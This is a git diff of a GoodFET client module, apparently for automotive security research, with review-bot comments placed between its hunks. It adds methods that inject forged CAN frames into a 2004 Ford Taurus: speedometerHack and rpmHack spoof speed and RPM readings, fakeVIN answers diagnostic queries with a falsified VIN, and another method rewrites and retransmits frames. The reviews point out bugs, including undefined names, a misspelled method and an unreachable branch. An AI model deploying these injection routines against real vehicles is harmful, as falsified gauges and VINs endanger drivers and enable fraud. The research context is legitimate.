X-Git-Url: http://git.rot13.org/?p=goodfet;a=blobdiff_plain;f=client%2FFordExperiments.py;h=cf70b8ac4246c47018c77eba530ec0e638727b71;hp=2baf55133cd6751e49fb8deaba3afbb7eba930fc;hb=34be758fc20244fe47823652172ba620f3ad5faf;hpb=d08bfd3c7cdc687fd68ba9025702c262665e52d3 diff --git a/client/FordExperiments.py b/client/FordExperiments.py index 2baf551..cf70b8a 100644 --- a/client/FordExperiments.py +++ b/client/FordExperiments.py @@ -6,22 +6,27 @@ import datetime import os from random import randrange from GoodFETMCPCAN import GoodFETMCPCAN; +from experiments import experiments from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication from intelhex import IntelHex; import Queue import math tT = time -class FordExperiments(GoodFETMCPCANCommunication): - - def init(self): - super(FordExperimetns,self).__init__(self) #initialize chip +class FordExperiments(experiments): + """ + This class is a subclass of experiments and is a car specific module for + demonstrating and testing hacks. + """ + def __init__(self, dataLocation = "../../contrib/ThayerData/"): + GoodFETMCPCANCommunication.__init__(self, dataLocation) + #super(FordExperiments,self).__init__(self) #initialize chip self.freq = 500; def mimic1056(self,packetData,runTime): #setup chip self.client.serInit() - self.spitSetup(500) + self.spitSetup(self.freq) #FIGURE out how to clear buffers self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False) packet1 = self.client.rxpacket(); @@ -114,7 +119,7 @@ class FordExperiments(GoodFETMCPCANCommunication): while( (time.time()-recieveTime) < runTime): #care about db3 or packet[8] that we want to count at the rate that it is dT = time.time()-tpast - packetValue += 1 + packetValue += 10 pV = packetValue%255 #temp = ((packetValue+1))%2 #if( temp == 1): 
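Review bot: The new `__init__` in the first hunk calls `GoodFETMCPCANCommunication.__init__(self, dataLocation)` although the class now derives from `experiments`, so the constructor of the declared base is never run. Unless `experiments` itself subclasses `GoodFETMCPCANCommunication` (not visible in this diff), Python 2 rejects that unbound-method call with a TypeError; if it does subclass it, whatever state `experiments.__init__` sets up is skipped. Calling the direct base, `experiments.__init__(self, dataLocation)`, and deleting the commented-out `#super(FordExperiments,self).__init__(self)` line would keep the class header and the constructor in step, assuming `experiments.__init__` takes the same argument. The default `"../../contrib/ThayerData/"` is resolved against the current working directory, so a short comment naming the directory the script is expected to run from would help.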
@@ -141,6 +146,25 @@ class FordExperiments(GoodFETMCPCANCommunication): #recieveTime = time.time() return packetParsed + + def cycle4packets1279(self): + self.client.serInit() + self.spitSetup(500) + # filter on 1279 + self.addFilter([1279, 1279, 1279, 1279, 1279, 1279], verbose = False) + packetParsed = self.getBackground(1279) + packet = [] + if (packetParsed[db0] == 16): + # if it's the first of the four packets, replace the value in db7 with 83 + packetParsed[db7] = 83 + # transmit new packet + self.client.txpacket(packetParsed) + else: + # otherwise, leave it alone + # transmit same pakcet we read in + self.client.txpacket(packetParsed) + # print the packet we are transmitting + print packetParsed def oscillateTemperature(self,time): 
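Review bot: `packetParsed[db0]` and `packetParsed[db7]` in `cycle4packets1279` index with the bare names `db0` and `db7`, which nothing in this hunk defines, so the method raises NameError unless they are module globals elsewhere; the old `__main__` block in this same diff keys packet data by string (`packetData['db4']`), which suggests `packetParsed['db0'] == 16` and `packetParsed['db7'] = 83` were intended. Both branches end in the same `self.client.txpacket(packetParsed)`, so the `else` can be dropped and the call made once after the `if`, and `packet = []` is never used. The method also hard-codes `self.spitSetup(500)` while the first hunk of this commit switches `mimic1056` to `self.spitSetup(self.freq)`. Whether `txpacket` accepts the parsed structure returned by `getBackground` rather than a raw byte list is not visible here and is worth confirming.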
@@ -187,11 +211,176 @@ class FordExperiments(GoodFETMCPCANCommunication): print packetCount; + def fakeVIN(self): + #reset eveything on the chip + self.client.serInit() + self.reset() + duration = 20; #seconds + + listenID = 2015 + listenPacket = [2, 9, 6, 153, 153, 153, 153, 153] + responseID = 2024 + #actual response by the car + #r1 = [34, 88, 0, 0, 0, 0, 0, 0] + #r2 = [33, 75, 50, 78, 51, 46, 72, 69 ] + #r3 = [16, 19, 73, 4, 1, 70, 65, 66] + + r1 = [34, 88, 0, 0, 0, 0, 0, 0] + r2 = [33, 75, 50, 78, 51, 46, 72, 69 ] + r3 = [16, 19, 73, 160, 159, 70, 65, 66] + + #format + SIDlow = (responseID & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (responseID >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + r1[0],r1[1],r1[2],r1[3],r1[4],r1[5],r1[6],r1[7]] + packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + r2[0],r2[1],r2[2],r2[3],r2[4],r2[5],r2[6],r2[7]] + packet3 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + r3[0],r3[1],r3[2],r3[3],r3[4],r3[5],r3[6],r3[7]] + + self.multiPacketSpit(packet0 = r1, packet1 = r2, packet2 = r3, packet0rts = True, packet1rts = True, packet2rts = True) + + #filter for the correct packet + self.filterForPacket(listenID, listenPacket[0],listenPacket[1], verbose = True) + self.client.rxpacket() + self.client.rxpacket() # flush buffers if there is anything + startTime = tT.time() + while( (tT.time() -startTime) < duration): + packet = self.client.rxpacket() + if( packet != None): + sid = ord(packet[0])<<3 | ord(packet[1])>>5 + if( sid == listenID): + byte3 = ord(packet[6]) + if( byte3 == listenPacket[3]): + print "SendingPackets!" 
+ #send packets + self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True) + + def speedometerHack(self, inputs): + + self.client.serInit() + self.spitSetup(500) + + self.addFilter([513, 513, 513]) + + SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + while(1): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + print self.client.packet2str(packet) + + print "DB4 = %02d " %ord(packet[9]) + mph = 1.617*ord(packet[9]) - 63.5 + print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph) + + # calculate our new mph and db4 value + mph = mph + inputs[0]; + newSpeed = ( mph + 63.5 ) / 1.617 + print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 1): + self.multiPacketSpit(packet0rts=True) + + def rpmHack(self, inputs): + """ + This method will increase the rpm by the given rpm amount. 
+ + @type inputs: List + @param inputs: Single element of a list that corresponds to the amount the user + wishses to + """ + + self.client.serInit() + self.spitSetup(500) + + self.addFilter([513, 513, 513]) + + SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + while(1): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + print self.client.packet2str(packet) + + print "DB4 = %02d " %ord(packet[5]) + rpm = 64.5*ord(packet[5]) - 61.88 + print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm) + + # calculate our new mph and db4 value + rpm = rpm + inputs[0]; + newRPM = ( rpm + 61.88 ) / 64.5 + print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 1): + self.multiPacketSpit(packet0rts=True) + + + if __name__ == "__main__": - fe = FordExperiments(); - packetData = {} - packetData['db4'] = 4; - runTime = 100; - #fe.mimic1056(packetData, runTime) - #fe.cycledb1_1056(runTime) - fe.oscillateTemperature(runTime) + + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description='''\ + + Run Hacks on a Ford taurus 2004: + + speedometerHack + fakeVIN + rpmHack + ''') + parser.add_argument('verb', choices=['speedometerHack', 'rpmHack']); + parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None); + + + args = parser.parse_args(); 
+ inputs = args.variable + fe = FordExperiments("../../contrib/ThayerData/"); + + if( args.verb == 'speedometerHack'): + fe.speedometerHack(inputs=inputs) + if( args.verb == 'rpmHack'): + fe.rpmHack(inputs=inputs) + elif( args.verb == 'fakeVIN'): + fe.fakeVIN() + +
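Review bot: The new `__main__` block passes `args.variable` straight into `speedometerHack` and `rpmHack`, which read `inputs[0]`; with `-v` omitted the default is `None`, and the TypeError only surfaces inside the receive loop, after `serInit()`, `spitSetup()` and `addFilter()` have already run. Reject it up front, e.g. `if args.verb != 'fakeVIN' and not inputs: parser.error('-v is required for ' + args.verb)`. The `elif( args.verb == 'fakeVIN')` branch is unreachable because `choices` lists only `['speedometerHack', 'rpmHack']` although the help text advertises `fakeVIN`, and inside `fakeVIN` the loop calls `self.multpackSpit(...)` while every other call site spells it `self.multiPacketSpit(...)`. `int(newSpeed)` and `int(newRPM)` go into a data byte with no range check, so a large or negative `-v` gives a value outside 0–255; clamp or refuse it before building `newPacket`. `argparse` is not among the imports shown in this diff, so confirm it is imported above line 6 of the file.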